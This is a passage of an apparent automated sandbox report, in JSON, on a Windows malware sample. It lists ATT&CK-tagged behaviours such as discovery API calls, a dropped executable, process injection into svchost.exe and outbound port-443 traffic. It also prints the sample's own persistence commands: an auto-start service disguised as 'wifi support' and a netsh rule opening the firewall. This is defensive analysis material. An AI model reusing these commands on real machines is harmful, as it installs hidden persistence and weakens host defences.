\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001200780e7000fce2120080f4c975000070000000000089f4c975f51cb8b90200000070e312006ce3120064e2120068e2120018e4120095e14c774da31100c0e21200c83ad37534e31200d58ccb7570e3120004e3120042a4c975a802d37544e31200d2f4c975080000006ef5c97544f5c9754d1db8b90200000070aa996e0000130026bb996e18e31200020000000000130070aa996e48e3120042a4c975a802d3758ce3120010a9996e08000000e6a8996ee6ddb9b90200000070aa996e0000130026bb996eac0e7000780e700058e312008050a56e18e41200f9f29d6e829632d7 (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000ba764cfe0300000044e57b01f083a6b8180e00008ce57b01c0e47b01590000000300000048e47b0150e47b0118e67b01d0bb156ac4f7cad3feffffff98e57b01bfe5146aba764cfe98e57b01cce5146a0600000000009c6a01000000dfe5146a3333ff040600000002000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4e57b01000000008e00000044e67b01feffffffcce57b01cf005177d6005177915a3a768e0000004700000044e67b0100000000a0e57b010000000008e67b01 (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d00410036004200420032003100360010799eb844de7b016d82d975147b240004010000 (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000640032003900640039006400320063003300650032003700300032006100300062003000650037006300370066003400340062003500630065006500650038003800650062003700660061006200310063003600650037003000350038006500390066002e00650078006500000000000000000000000000000000000000000000000000000000000000ff2b5077ad773a76d8ebad75ac011c0000001c0000000000000000000000ffffcc000000000000000000000000000000000000000100f700cc000000000000000000000008701c0000000000200000000000000000000000 (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001c0060a72600000000003e00003e340000c088a9260000bd2600a85a2600f001000000001c000400000060a72600acee7b010464507738011c00e0635077f1513a760000000000001c0068a726006dd17b753811deb86cae36770000000000000000f401000000bd2600d82f1c000100000000001c0050011c000c00000068a72600d82f1c0002000002180000005d22007f820000000000000000000000030000004cee7b01820000007f070000000000005d22007f02000000c075837500bd260000000000c075837568ee7b01e8301c0000000000d82f1c00c0ee7b01ff2b5077 (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000d2fa3b610300000044e57b01f083a6b84c1200008ce57b01c0e47b015b0000000300000048e47b0150e47b0118e67b01d0bb156ac4f7cad3feffffff98e57b01bfe5146ad2fa3b6198e57b01cce5146a8205000000009c6a01000000dfe5146a3333ff048205000004000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001c0078d12600000000001c00001c340000c0a0d32600e8cb2600f09c2300e000000000001c000100000078d12600acee7b010464507738011c00e0635077f1513a760000000000001c0080d126006dd17b753811deb86cae36770000000000000000e0000000e8cb260050011c000100000000001c0050011c000c00000080d1260050011c00020000021800000082000082600000000000000000000000030000004cee7b018000000002000000000000000330003360000000c0758375d05f270000000000c075837568ee7b01fc2f1c0000000000d82f1c00c0ee7b01ff2b5077 (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000072b2514a0300000044e57b01f083a6b8180f00008ce57b01c0e47b015b0000000300000048e47b0150e47b0118e67b01d0bb156ac4f7cad3feffffff98e57b01bfe5146a72b2514a98e57b01cce5146a8205000000009c6a01000000dfe5146a3333ff048205000005000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00004512)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"IsWow64Process\" with parameter \"4512\" - (UID: 00000000-00004512)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"nhhyjsjl.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00002444)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"FindFirstFileW\" with parameter C:\\cmd.* (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\cmd.* (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"FindNextFileW\" with parameter cmd.exe (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"FindFirstFileW\" with parameter C:\\sc.* (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\sc.* (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"FindNextFileW\" with parameter sc.exe (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"FindFirstFileW\" with parameter C:\\netsh.* (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\netsh.* (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"FindNextFileW\" with parameter netsh.exe (UID: 00000000-00004512)\n \"cmd.exe\" called \"FindFirstFileW\" with parameter C:\\ (UID: 00000000-00004672)\n \"cmd.exe\" called \"FindNextFileW\" with parameter nhhyjsjl.exe (UID: 00000000-00004672)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"sc.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"nhhyjsjl.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"nhhyjsjl.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"netsh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-153", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieves adapter information", "description": "\"svchost.exe\" called \"GetAdaptersInfo\" with parameter \"000000000c0000007b30374234314637392d314145432d343738322d413645382d3843323846464241333545447d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000496e74656c2852292050524f2f31303030204d54204e6574776f726b20436f6e6e656374696f6e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006000000c620b373cb0d00000c000000060000000100000000000000000000003139322e3136382e302e3200000000003235352e3235352e3235352e30000000c0a80002000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000802dee675c33ee670000000000000000\" - (UID: 00000000-00002980)", "origin": "API Call", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"sc.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"1f61d0\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"588936\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"36\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00002444)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00002444)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"nhhyjsjl.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\ZVDNUOQU\"; Key: \"IMAGEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\nhhyjsjl.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" wrote 32256 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\nhhyjsjl.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000100100000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"nhhyjsjl.exe.67EE49B9.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"nhhyjsjl.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\nhhyjsjl.exe]- [targetUID: 00000000-00004512]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "static-6", "relevance": 1, "name": "Section contains high entropy", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f\" has section name .text with entropy \"6.630102803682182\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f\" has section name .text with entropy \"7.972855291312212\"\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f\" has section name .reloc with entropy \"6.221496050028631\"\n \"nhhyjsjl.exe\" has section name .text with entropy \"6.630102803682182\"\n \"nhhyjsjl.exe\" has section name .text with entropy \"7.972855291312212\"\n \"nhhyjsjl.exe\" has section name .reloc with entropy \"6.221496050028631\"", "origin": "Static Parser", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 443 is sent without HTTP header\n TCP traffic to <IPv4> on port 443 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "api-117", "type": 6, "relevance": 10, "name": "Calls an API typically used to execute an application", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"ShellExecuteA\" with parameter cmd (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"ShellExecuteA\" with parameter 7363 (UID: 00000000-00004512)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" called \"ShellExecuteA\" with parameter netsh (UID: 00000000-00004512)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" (UID: 00000000-00004512)\n Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\zvdnuoqu\\\\\" (UID: 00000000-00004280)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\nhhyjsjl.exe\" %WINDIR%\\\\system32\\\\zvdnuoqu\\\\\" (UID: 00000000-00004672)\n Spawned process \"sc.exe\" with commandline \"create zvdnuoqu binPath= \"%WINDIR%\\\\system32\\\\zvdnuoqu\\\\nhhyjsjl.exe /d\\\\\"C:\\\\71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\\\\\"\" type= own start= auto DisplayName= \"wifi support\"\" (UID: 00000000-00001376)\n Spawned process \"sc.exe\" with commandline \"description zvdnuoqu \"wifi internet conection\"\" (UID: 00000000-00004608)\n Spawned process \"sc.exe\" with commandline \"start zvdnuoqu\" (UID: 00000000-00004836)\n Spawned process \"nhhyjsjl.exe\" with commandline \"/d\"C:\\\\71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\"\" (UID: 00000000-00002928)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00002444)\n Spawned process \"svchost.exe\" (UID: 00000000-00002980)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 476)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 592)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 572)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 572)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\sc.exe\" (Handle: 572)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 520)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 520)\n \"71caf290168c22d29d9d2c3e2702a0b0e7c7f44b5ceee88eb7fab1c6e7058e9f.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\netsh.exe\" (Handle: 520)\n \"nhhyjsjl.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"nhhyjsjl.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"nhhyjsjl.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)\n \"nhhyjsjl.exe\" wrote 86016 bytes to a remote process \"C:\\Windows\\System32\\svchost.exe\" (Handle: 252)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-129", "type": 6, "relevance": 10, "name": "Creates a process in suspended mode (likely for process injection)", "description": "\"nhhyjsjl.exe\" called \"CreateProcessA\" with parameter \"svchost.exe\" - (UID: 00000000-00002928)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "api-83", "type": 6, "relevance": 7, "name": "Writes PE header to memory", "description": "\"nhhyjsjl.exe wrote PE header bytes (\"4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000d80000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000fdb74393b9d62dc0b9d62dc0b9d62dc0b9d62cc028d62dc0b0aebec0b6d62dc0d6a083c0b8d62dc0d6a0b3c0b8d62dc0d6a086c0a2d62dc0d6a0b0c0b8d62dc052696368b9d62dc000000000000000000000000000000000504500004c010400e1db595a0000000000000000e00002010b010a0000e60000004a0000000000006b9a0000001000000000010000000600001000000002000005000100000000000500010000000000005001000004000000000000020040810000100000100000000010000010000000000000100000000000000000000000b0120100a0000000000000000000000000000000000000000000000000000000004001005c0e0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001005c0200000000000000000000000000000000000000000000000000002e74657874000000b0e400000010000000e6000000040000000000000000000000000000200000602e726461746100009a1e0000000001000020000000ea0000000000000000000000000000400000402e64617461000000581900000020010000020000000a0100000000000000000000000000400000c02e72656c6f630000f20f00000040010000100000000c010000000000000000000000000040000042000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000